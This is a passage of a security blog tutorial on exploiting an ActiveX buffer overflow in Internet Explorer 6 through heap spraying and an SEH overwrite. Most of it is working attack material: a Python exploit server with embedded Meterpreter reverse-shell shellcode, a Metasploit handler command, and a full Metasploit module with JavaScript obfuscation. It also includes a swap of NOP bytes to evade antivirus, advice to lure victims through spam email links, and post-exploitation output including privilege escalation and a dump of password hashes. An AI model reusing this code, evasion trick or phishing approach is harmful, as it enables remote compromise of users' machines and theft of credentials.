    self.printCustomHTTPResponse(200)
   
    if self.path == "/":
    target = self.client_address[0]
        self.wfile.write("""<html><head>""")
        self.wfile.write("""
        <title>vulActiveX.dll Heap Spray SEH Exploit</title>
    <object classid='clsid:C44CBF61-7844-4C4B-BC77-7643FD70848E' id='_vulActiveX'>
    </object>
    <script type="
text/javascript" language="javascript">
    //==========================================//
    //       vulActiveX Heap Spraying SEH       //
    //                                          //
    //          HackSys Team - Panthera         //
    //        http://hacksys.vfreaks.com/       //
    //         hacksysteam@hotmail.com          //
    //                                          //
    //          Author: Ashfaq Ansari           //
    //      ashfaq_ansari1989@hotmail.com       //
    //                                          //
    //==========================================//

    //Heading
    heading = ("
<h4><pre>" +
    "
#########################################################<br>" +
    "#vulActiveX.dll ActiveX Buffer Overflow (Heap Spray SEH)#<br>" +
    "#########################################################<br>" +
    "                 HackSys Team - Panthera                 <br>" +
    "                  Author: Ashfaq Ansari                  <br>" +
    "                http://hacksys.vfreaks.com               <br>" +
    "                 hacksysteam@hotmail.com                 <br>" +
    "#########################################################<br>" +
    "#              Tested on WinXPSP3 with IE6              #<br>" +
    "#########################################################<br>" +
    "</pre></h4>");

    document.write(heading);
    //LHOST = <Attackers IP>
        //root@bt: ~#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.96.128 R |
        //msfencode -a x86 -c 10 -e x86/shikata_ga_nai -t js_le > /root/Desktop/meterpreter_js.txt
       
        // Don't forget to remove slashes
        shellcode = unescape('
%u\deda%u\22b8%u\f7be%u\d9da%u\2474%u\5af4%u\c931%u\86b1%u\4231%u\0318%u\1842%u\ea83' +
                             '
%u\5cde%u\6202%u\04cd%u\736f%u\8528%u\00a9%u\feee%u\c214%u\4f27%u\25d7%u\a4f1%u\002b' +
                             '
%u\47e9%u\70c5%u\1820%u\fe20%u\29ae%u\a19c%u\55eb%u\d447%u\adde%u\a7fd%u\ad5c%u\a4ff' +
                             '
%u\c6f7%u\c342%u\b517%u\9600%u\4563%u\a936%u\89c0%u\f82f%u\06ef%u\27c3%u\b04d%u\53ec' +
                             '
%u\89e0%u\809d%u\e20b%u\b12a%u\69ab%u\841a%u\3c42%u\5d40%u\e496%u\db30%u\8ae0%u\aba3' +
                             '
%u\d9e0%u\4a92%u\6079%u\b773%u\84d4%u\d4b7%u\48ba%u\3fd8%u\2c0e%u\523a%u\4143%u\c281' +
                             '
%u\122c%u\86da%u\eddd%u\f0fb%u\d5f2%u\1ed0%u\5517%u\8954%u\e9cc%u\6b52%u\3ab8%u\6a0b' +
                             '
%u\cb3c%u\3da8%u\b650%u\4e10%u\a087%u\5946%u\02f8%u\823c%u\d1ee%u\7b62%u\4c80%u\1d70' +
                             '
%u\665b%u\492e%u\9fff%u\2984%u\b122%u\a6da%u\7e40%u\39aa%u\a713%u\7bc6%u\476a%u\0c22' +
                             '
%u\291b%u\9bd1%u\0415%u\2200%u\1f97%u\8ef5%u\5dfc%u\9dd2%u\ba07%u\adfa%u\7ac2%u\3577' +
                             '
%u\6805%u\eda9%u\dbb2%u\d834%u\43fd%u\e600%u\db3b%u\b3b4%u\5be6%u\63dd%u\14af%u\9159' +
                             '
%u\e9be%u\b797%u\5f4f%u\5d15%u\88cb%u\3931%u\80f5%u\3dd1%u\f807%u\f2b6%u\b24e%u\1ae6' +
                             '
%u\26d5%u\a6e5%u\f03a%u\8eeb%u\ee47%u\1168%u\cf23%u\d5b1%u\5861%u\4dc5%u\3bff%u\f4de' +
                             '
%u\bfac%u\96cb%u\fa08%u\c9b0%u\388c%u\1341%u\6ba7%u\6b41%u\8488%u\c896%u\9e02%u\55fb' +
                             '
%u\9c47%u\106a%u\cf56%u\63ce%u\478d%u\d139%u\f2b5%u\2ed0%u\44fa%u\bf51%u\ffb6%u\da59' +
                             '
%u\3945%u\4ad1%u\f908%u\3460%u\bb2e%u\0509%u\4585%u\30f7%u\fd04%u\398a%u\233e%u\1871' +
                             '
%u\4728%u\3de7%u\c1aa%u\614b%u\14e4%u\da02%u\6dbc%u\691c%u\29d2%u\2a71%u\64ee%u\c39a' +
                             '
%u\dc62%u\1e69%u\aaad%u\9762%u\eef6%u\e8f8%u\b3fc%u\be3b%u\9b6a%u\6369%u\9de8%u\8c0d' +
                             '
%u\ba32%u\181b%u\4766%u\4337%u\057c%u\5b5d%u\2efa%u\ed88%u\7c5c%u\f173%u\432d%u\3ed4' +
                             '
%u\b73e%u\3c05%u\8c1b%u\3112%u\162a%u\af2a%u\af07%u\e55a%u\62ea%u\1d48%u\d0f8%u\4a35' +
                             '
%u\9b34%u\1e37%u\6b12%u\1751%u\c493%u\4903%u\877a%u\7e0d%u\bdd0%u\a156%u\d581%u\0621' +
                             '
%u\1e67%u\b59c%u\1b94%u\7bed%u\42cb%u\feb3%u\5fb5%u\7751%u\e062%u\c295%u\edeb%u\2fcc' +
                             '
%u\2ed5%u\e7de%u\3e14%u\dd4f%u\55c5%u\b4b0%u\1baf%u\ee54%u\44f3%u\6340%u\31b1%u\5534' +
                             '
%u\5605%u\faf0%u\7c83%u\6e60');
   
        nops = unescape('
%u\9090%u\9090');
        headersize = 20;

        //write the output to Internet Explorer'
s window
        document.write("<h2>vulActiveX.dll Heap Spray Attack</h2>");

        //create one block with nops
        document.write("Creating one block of memory with <b>NOPS</b>.</br>");
        slackspace = headersize + shellcode.length;
        while (nops.length < slackspace) nops += nops;
        fillblock = nops.substring(0, slackspace);

        //enlarge block with nops, size 0x50000
        document.write("Enlarging the memory with <b>NOPS</b> of size <b>0x5000</b>.</br>");
        block = nops.substring(0, nops.length - slackspace);
        while (block.length + slackspace < 0x50000) block = block + block + fillblock;

        document.write("Spraying <b>NOPS + SHELLCODE</b> <b>250</b> times.</br>");

        //spray 250 times : nops + shellcode
        memory = new Array();
        for (counter = 0; counter < 250; counter++) {
            memory[counter] = block + shellcode;

            //show the status of spray on Status bar
            window.status = "Spraying: " + Math.round(100 * counter / 250) + "% done";
        }

        document.write("Allocated <b>" + (block.length + shellcode.length).toString() + "</b> bytes.<br>");
        document.write("Heap Spraying completed successfully.<br>");
        document.write("Triggering vulnerability in <b>vulActiveX.dll</b>.<br>");
        window.status = "Launching Exploit";
        alert("Launching Exploit");

        evil_payload = "";
        while (evil_payload.length < 14356) evil_payload += unescape('%06');

        //pass the parameter to BufferOverflow method
        _vulActiveX.BufferOverflow(evil_payload);
    </script></head><body></body></html>""")
       
        print GREEN + ("
\n\n[*] Victim IP Address: %s [*]" % (target))
        time.sleep(2)
        print GREEN + ("
[*] Port Connected: 80 [*]")
        time.sleep(2)
        print RED + ("
[*] Heap Spraying the victims browser [*]")
        time.sleep(2)
        print RED + ("
[*] Please wait for Meterpreter sessions [*]")
        time.sleep(2)

    else :
      self.send_error(404,'FILE NOT FOUND')

  # Print custom HTTP Response messages
  def printCustomHTTPResponse(self, respcode):
    self.send_response(respcode)
    self.send_header("
Content-type", "text/html")
    self.send_header("
Server", "myRequestHandler")
    self.end_headers()

 # In case of any exceptions, pass them
 except Exception:
    pass

# Bind to port 80
httpd = HTTPServer(('', 80), myRequestHandler)

# Print the Logo
print GREEN + ("
""
 _    _            _     _____             _______                  
| |  | |          | |   / ____|           |__   __|                  
| |__| | __ _  ___| | _| (___  _   _ ___     | | ___  __ _ _ __ ___  
|  __  |/ _` |/ __| |/ /\___ \| | | / __|    | |/ _ \/ _` | '_ ` _ \
| |  | | (_| | (__|   < ____) | |_| \__ \    | |  __/ (_| | | | | | |
|_|  |_|\__,_|\___|_|\_\_____/ \__, |___/    |_|\___|\__,_|_| |_| |_|
                                __/ |                                
                               |___/                                
""")

# Print Header
print GREEN + ("""
   ###############################################################
   #   vulActiveX.dll ActiveX Buffer Overflow (Heap Spray SEH)   #
   ###############################################################
   #                                                             #
   #                  Written by HackSys Team                    #
   #                  Author: Ashfaq Ansari                      #
   #                http://hacksys.vfreaks.com                   #
   #                 hacksysteam@hotmail.com                     #
   #                                                             #
   ###############################################################
   #             Tested on WinXP SP3 EN with IE6                 #
   ###############################################################
""")

print BLUE + ("[+] Starting vulActiveX.dll Buffer Overflow (Heap Spray SEH)")
time.sleep(2)
print GREEN + ("[+] Launching Meterpreter Multi Handler")
cmd = '
msfcli exploit/multi/handler LHOST=0.0.0.0 PAYLOAD=windows/meterpreter/reverse_tcp E'
subprocess.Popen([cmd], shell=True)
time.sleep(5)
print BLUE + ("[+] Waiting for Meterpreter Multi Handler to be ready")
time.sleep(20)
print GREEN + ("[+] Mini HTTP Server started and binded to port 80")
time.sleep(2)
print RED + ("[+] Waiting for victims to connect")
print RED + ("\n\nType CTRL+C to exit the exploit..")

try:
     # handle the connections
     httpd.handle_request()
     # Serve HTTP server forever
     httpd.serve_forever()
     
# Except Keyboard Interrupts and throw custom message
except KeyboardInterrupt:
       print RED + ("\n\nExiting exploit...\n\n")
       sys.exit(1)

 

Our exploit PoC in Python language is ready to be served to victim. Now, from the attacker’s point of view, it is necessary that the victim click on a hyperlink that will redirect the browser to attacker’s IP. This can be achieved in many ways like spamming victim’s email inbox, etc.

 

Build The Trap

 

Let’s run our exploit_poc_vulactivex.py and wait for the victim to check his email inbox and click on the malicious link.
 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
root@bt:~/Desktop# ./exploit_poc_vulactivex.py

 _    _            _     _____             _______                                      
| |  | |          | |   / ____|           |__   __|                                    
| |__| | __ _  ___| | _| (___  _   _ ___     | | ___  __ _ _ __ ___                    
|  __  |/ _` |/ __| |/ /\___ \| | | / __|    | |/ _ \/ _` | '_ ` _ \                    
| |  | | (_| | (__|   < ____) | |_| \__ \    | |  __/ (_| | | | | | |                  
|_|  |_|\__,_|\___|_|\_\_____/ \__, |___/    |_|\___|\__,_|_| |_| |_|                  
                                __/ |                                                  
                               |___/                                                    
                                                                                       
   ###############################################################                      
   #   vulActiveX.dll ActiveX Buffer Overflow (Heap Spray SEH)   #                      
   ###############################################################                      
   #                                                             #                      
   #                  Written by HackSys Team                    #                      
   #                  Author: Ashfaq Ansari                      #                      
   #                http://hacksys.vfreaks.com                   #                      
   #                 hacksysteam@hotmail.com                     #                      
   #                                                             #                      
   ###############################################################                      
   #              Tested on WinXP SP3 EN with IE6                #                      
   ###############################################################                      

[+] Starting vulActiveX.dll Buffer Overflow (Heap Spray SEH)                            
[+] Launching Meterpreter Multi Handler                                                
[*] Please wait while we load the module tree...                                        
[+] Waiting for Meterpreter Multi Handler to be ready                                  

                 _---------.                                                            
             .'
#######   ;."                                                          
  .---,.    ;@             @@`;   .---,..                                              
." @@@@@'.,'@@            @@@@@',.'@@@@ ".                                              
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;                                              
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
                                             
     "--'.@@@  -.@        @ ,'-   .'--"                                                
          ".@' ; @       @ `.  ;'                                                      
            |@@@@ @@@     @    .                                                        
             ' @@@ @@   @@    ,                                                        
              `
.@@@@    @@   .                                                          
                ',@@     @   ;           _______________                                
                 (   3 C    )     /|___ / HackSys Team! \                              
                 ;@'. __*__,."
   \|--- \_______________/                              
                  '(.,...."/                                                            


       =[ metasploit v4.1.0-release [core:4.1 api:1.0]
+ -- --=[ 748 exploits - 384 auxiliary - 98 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r14013 updated 276 days ago (2011.10.20)

Warning: This copy of the Metasploit Framework was last updated 276 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

LHOST => 0.0.0.0
PAYLOAD => windows/meterpreter/reverse_tcp
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
[+] Mini HTTP Server started and binded to port 80
[+] Waiting for victims to connect                                                      


Type CTRL+C to exit the exploit..

 

Our exploit program is running and waiting for victims to connect on HTTP port (i.e. port 80). We have spammed victim’s email inbox with emails containing the malicious hyperlinks to the exploit server. If we are lucky then, as soon as the victim click’s on the link, our payload will be delivered and we should get a Meterpreter session.
 

Let’s have patience and wait for the victim’s action. We might have to wait for many hours as we cannot determine when exactly the victim will open our spam emails and click on the malicious link.
 

Now, let’s think from the point of view of a Computer user who is less concerned about the security as he has a great trust on the Anti-Virus program that is installed in his Windows XP Professional SP3 machine (.i.e. Avast Free Anti-Virus 2012).
 

062113 1053 HeapSprayin721 Heap Spraying   Active X Controls Under Attack

 

Victim click’s on the malicious link and the Internet Explorer 6 starts browsing the link. In this case we consider a pseudo domain bt.com. Let’s check what our victim is doing.
 

062113 1053 HeapSprayin731 Heap Spraying   Active X Controls Under Attack

 

Oh, no. Unfortunately, the attack was unsuccessful and Anti-Virus has successfully blocked the hack attempt. Let’s see what happened to the attacker’s machine.
 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
LHOST => 0.0.0.0
PAYLOAD => windows/meterpreter/reverse_tcp
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
[+] Mini HTTP Server started and binded to port 80
[+] Waiting for victims to connect

Type CTRL+C to exit the exploit..
192.168.96.131 - - [26/Jul/2012 00:05:01] "GET / HTTP/1.1" 200 -


[*] Victim IP Address: 192.168.96.131 [*]
[*] Port Connected: 80 [*]
[*] Heap Spraying the victims browser [*]
[*] Please wait for Meterpreter sessions [*]

 

Victim made the GET / HTTP/1.1 request but the payload was not delivered to the victim and no Meterpreter sessions were created.
 

Anti-Virus Evasion

 

Knock-Knock! Hey, what if we could bypass the Anti-Virus detection. What could be the possible reasons for the AV detection? Let’s make note of few things.
 

Guess 1: Either our shellcode got detected by Anti – Virus engine.
Guess 2: Either NOPS might be the cause for Trojan detection alarm by Anti – Virus engine.

We already encoded our Meterpreter payload using msfencode so there is less chance for the shellcode detection. What else could be the cause for AV detection and attack failure?
 

After trying the exploit PoC without NOPs, we were able to deliver the payload page and no Anti-Virus alarm triggered.
 

Hence, we came to a conclusion that NOPs might be the problem. There might be other possible causes of our attack failure. Let’s continue and generate other NOP equivalent OP code. There is a wonderful NOP builder module in Metasploit named as opty2.
 

Let’s fire up msfconsole and generate a NOP.
 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
root@bt:~/Desktop# msfconsole

     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)___________________
         \ _ /                      |\
          o_o \     HACKSYS TEAM    | \
               \   _______________  |  *
                |||             WW|||
                |||               |||


       =[ metasploit v4.1.0-release [core:4.1 api:1.0]
+ -- --=[ 748 exploits - 384 auxiliary - 98 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r14013 updated 280 days ago (2011.10.20)

Warning: This copy of the Metasploit Framework was last updated 280 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

msf > use x86/opty2
msf  nop(opty2) > generate 1
buf =
"\xf5"
msf  nop(opty2) > exit

 

Let’s replace the nops from our exploit PoC and replace with the newly generated NOP (“\xf5″).
 

Before modification:
 

1
nops = unescape('%u\9090%u\9090');

 

After modification:
 

1
nops = unescape('%u\f5f5%u\f5f5');

 

Let’s re-run the exploit after the modification has been done. Let’s hope that we are able to bypass AV detection. Let’s intimate our victim to click again on the malicious link.
 

062113 1053 HeapSprayin741 Heap Spraying   Active X Controls Under Attack

 

I think our payload got delivered to victim’s Computer. Let’s see if any Meterpreter session were created or not on attackers box running BackTrack 5 R1.
 

1
2
3
4
5
6
7
8
9
10
11
192.168.96.131 - - [26/Jul/2012 01:10:17] "GET / HTTP/1.1" 200 -                        
                                                                                       
                                                                                       
[*] Victim IP Address: 192.168.96.131 [*]                                              
[*] Port Connected: 80 [*]                                                              
[*] Heap Spraying the victims browser [*]                                              
[*] Please wait for Meterpreter sessions [*]                                            
[*] Sending stage (752128 bytes) to 192.168.96.131                                      
[*] Meterpreter session 1 opened (192.168.96.128:4444 -> 192.168.96.131:1052) at 2012-07-26 01:11:30 +0530

meterpreter >

 

Yeah! We have finally done it. We got a Meterpreter session and we have successfully bypassed Anti-Virus detection.
 

Porting To Metasploit

 

As a fan of Metasploit developed by HD Moore, we decided to port our current exploit to Metasploit module.
 

———- vulActiveX.rb ———-

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::Remote::HttpServer::HTML


    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'vulActiveX.dll SEH Exploit',
            'Description'    => %q{
                    This module exploits a seh vulnerability within vulActiveX.dll.
                         
                         This exploit utilizes a combination of heap spraying and
                         SEH Overwrite technique. Presently this exploit does not
                         bypass DEP and ASLR. Unfortunately unable to find correct
                         gadagets to do stack pivoting.
            },
            'License'        => MSF_LICENSE,
            'Author'         => [ 'Ashfaq Ansari' ],
            'Version'        => '$Revision: 1$',
            'References'     =>
                [
                    [ 'URL', 'http://hacksys.vfreaks.com/' ],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space'         => 1024,
                    'BadChars'      => "\x00",
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Automatic', { } ],
                    [ 'Internet Explorer 6 - Windows XP SP3', { 'Ret' => 0x06060606 } ],
                    [ 'Internet Explorer 7 - Windows XP SP3', { 'Ret' => 0x0c0c0c0c } ],
                ],
            'DisclosureDate' => '',
            'DefaultTarget'  => 0))
       
        register_options(
            [
                OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true])
            ], self.class)
    end

    def autofilter
        false
    end

    def check_dependencies
        use_zlib
    end

    def auto_target(cli, request)
       
        agent = request.headers['User-Agent']
        print_status("Checking user agent: #{agent}")

        if agent =~ /MSIE 6\.0/
            print_status("Victim is running Internet Explorer 6")
            mytarget = targets[1]
        elsif agent =~ /MSIE 7\.0/
            print_status("Victim is running Internet Explorer 7")
            mytarget = targets[2]
        else
            print_error("Victim's browser is not supported")
            mytarget = nil
        end

        return mytarget

    end
   
    def on_request_uri(cli, request)
        mytarget = target
       
        print_status("#{cli.peerhost}:#{cli.peerport} Received request for %s" % request.uri.inspect)
       
        if target.name == 'Automatic'
            mytarget = auto_target(cli, request)
            if mytarget.nil?
                send_not_found(cli)
                return
            end
        end
       
        return if ((p = regenerate_payload(cli)) == nil)

        shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
       
        ret     = Rex::Text.uri_encode([mytarget['Ret']].pack('V*'))

        nops = Rex::Text.to_unescape(make_nops(4))
       
        js = <<-JS

        shellcode = unescape('#{shellcode}');
       
        nops = unescape('#{nops}');
       
        headersize = 20;
       
        slackspace = headersize + shellcode.length;
        while (nops.length < slackspace) nops += nops;
        fillblock = nops.substring(0, slackspace);

        block = nops.substring(0, nops.length - slackspace);
        while (block.length + slackspace < 0x50000) block = block + block + fillblock;
       
        memory = new Array();
        for (counter = 0; counter < 250; counter++) {
          memory[counter] = block + shellcode;
          window.status = "Heap Spraying: " + Math.round(100 * counter / 250) + "% done";
        }
       
        evil_payload = "";
        while (evil_payload.length < 14356) evil_payload += unescape('#{ret}');
        window.status = "Launching Exploit";
        _vulActiveX.BufferOverflow(evil_payload);
        JS

        if datastore['OBFUSCATE']
            js = ::Rex::Exploitation::JSObfu.new(js)
            js.obfuscate
        end

        content = <<-HTML
        <html>
        <head>
        <title>vulActiveX.dll - Metasploit Module - HeapSpray</title>
        <object classid='clsid:C44CBF61-7844-4C4B-BC77-7643FD70848E' id='_vulActiveX'>
        </object>
        <script type="text/javascript" language="javascript">
        #{js}
        </script>
        </head>
        <body>
        </body>
        </html>
        HTML

        print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

        # Transmit the response to the client
        send_response_html(cli, content)
    end

end

 

In order to use vulActiveX.rb as Metasploit module, we will have to copy vulActiveX.rb to the below given location.

/pentest/exploits/framework/modules/exploits/windows/browser/

Let’s load msfconsole after integrating our module into Metasploit and launch the exploit again.
 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
root@bt:~# msfconsole


#     #                       #####              
#     #   ##    ####  #    # #     # #   #  ####  
#     #  #  #  #    # #   #  #        # #  #      
####### #    # #      ####    #####    #    ####  
#     # ###### #      #  #         #   #        #
#     # #    # #    # #   #  #     #   #   #    #
#     # #    #  ####  #    #  #####    #    ####  
                                                 
#######                      
   #    ######   ##   #    #
   #    #       #  #  ##  ##
   #    #####  #    # # ## #
   #    #      ###### #    #
   #    #      #    # #    #
   #    ###### #    # #    #
                             

       =[ metasploit v4.1.0-release [core:4.1 api:1.0]
+ -- --=[ 749 exploits - 384 auxiliary - 98 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r14013 updated 276 days ago (2011.10.20)

Warning: This copy of the Metasploit Framework was last updated 276 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

msf > use exploit/windows/browser/vulActiveX
msf  exploit(vulActiveX) > set URIPATH /
URIPATH => /

msf  exploit(vulActiveX) > set SRVPORT 80
SRVPORT => 80

msf  exploit(vulActiveX) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf  exploit(vulActiveX) > set LHOST 192.168.96.128
LHOST => 192.168.96.128

msf  exploit(vulActiveX) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.96.128:4444
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.96.128:80/
[*] Server started.
msf  exploit(vulActiveX) >

 

Our exploit is running and waiting for the victim to connect on port 80. Let’s connect to the exploit server on port 80 and check if the exploit is working as expected and is able to bypass AV detection.
 

062113 1053 HeapSprayin751 Heap Spraying   Active X Controls Under Attack

 

I think the payload got delivered successfully. Let’s check the msfconsole and find out whether any sessions were made.
 

1
2
3
4
5
6
msf  exploit(vulActiveX) > [*] 192.168.96.131:1078 Received request for "/"
[*] Checking user agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
[*] Victim is running Internet Explorer 6
[*] Sending exploit to 192.168.96.131:1078...
[*] Sending stage (752128 bytes) to 192.168.96.131
[*] Meterpreter session 1 opened (192.168.96.128:4444 -> 192.168.96.131:1079) at 2012-08-03 17:41:45 +0530

 

Fantastic, we got a Meterpreter session opened to the attacker’s box. Let’s run some of the msfconsole commands and do some post exploitation stuffs.
 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
msf  exploit(vulActiveX) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WINXPSP3
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32

meterpreter > getuid
Server username: WINXPSP3\HackSys

meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ASPNET:1004:04d87f074f9d3bf728e4250679477c4d:cf8fb670cdb63730787019ac56a13691:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HackSys:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a7367b6f192390a41ccac07f5f5b44b3:91ab307b3a1b696e072905c10cbb7dae:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:5e5944978ae366e7c7c2ccc1ef52c779:::
Victim:1005:5e0fbfa70aacb106695109ab020e401c:6143bf16ef4c89aa72a0a563164a1538:::

meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a VMware Virtual Machine

meterpreter > exit

 

Our victim is running Windows XP Professional (Build 2600, Service Pack 3) under VMware Virtual Machine. We have successfully escalated our privileges to SYSTEM.
 

Finally, our goal has been achieved and we have completely compromised a Windows box using a simple bug. Please be careful before installing any add-ons for your browser and we wish you all happy and safe browsing.
 

062113 1053 HeapSprayin761 Heap Spraying   Active X Controls Under Attack

 

Safe Computing!

 

We hope that you all have enjoyed reading this paper. If you have any feedback or suggestions, please feel free to write us at hacksysteam@hotmail.com

 

Thanks To

 

Richard Brengle former Director of Writing Assessment at the University of Michigan, English Composition Board

(1980-1986). He is currently a freelance writer and editor. Richard also edits for the Blue Pencil Editing Service. May his sould rest in peace. You will always be in our hearts.

https://www.bluepencilediting.com/

Peter Van Eeckhoutte (corelanc0d3r) – Security Researcher, Speaker and founder of the Corelan Security Team.

https://www.corelan.be/

Thank you, Peter, for reviewing my paper.
 

Greets To

 
Ruei-Min Jiang a.k.a MicroMike, Khalil Zhani a.k.a Senator of Pirates, Qnix@0x80.org, nullThe Open Security Community
 

References

 

ActiveX Wiki – http://en.wikipedia.org/wiki/ActiveX

Symantec Threat Report – http://www.symantec.com/threatreport/

Fuzzing OWASP – https://www.owasp.org/index.php/Fuzzing

Heap Data Structure – http://en.wikipedia.org/wiki/Heap_(data_structure)

Heap Spraying – http://en.wikipedia.org/wiki/Heap_spraying

Heap Spraying Demystified – https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/

Meterpreter Client – http://en.wikibooks.org/wiki/Metasploit/MeterpreterClient
 

14,457 total views, 1 views today

 Heap Spraying   Active X Controls Under Attack

Ashfaq Ansari

Security Researcher
Ashfaq Ansari is the founder of HackSys Team code named “Panthera". He is a Security Researcher with experience in various aspects of Information Security. He has written and published Whitepapers and tools for Linux & Windows.

3 Responses to “Heap Spraying – Active X Controls Under Attack”

  1. NO-MERCY says:

    Hello : Ashfaq Ansari
    ———————
    Thank u very much 4 that great job
    very very useful tutorial .. see it at PS papers
    i’m waiting your IE9 OR 10 Paper soon ….
    Thanks Again

    Greetings :)

  2. first sorry for bad engish. I read heap……activex paper.its very easy to understand..can u write same paper for win7 internet explorer exploit.

Trackbacks/Pingbacks

  1. Heap Spraying – Active X Controls Under A... - […] Introduction An ActiveX control is essentially a simple OLE object that supports the IUnknown interface.  […]

Leave a Reply

Your email address will not be published. Required fields are marked *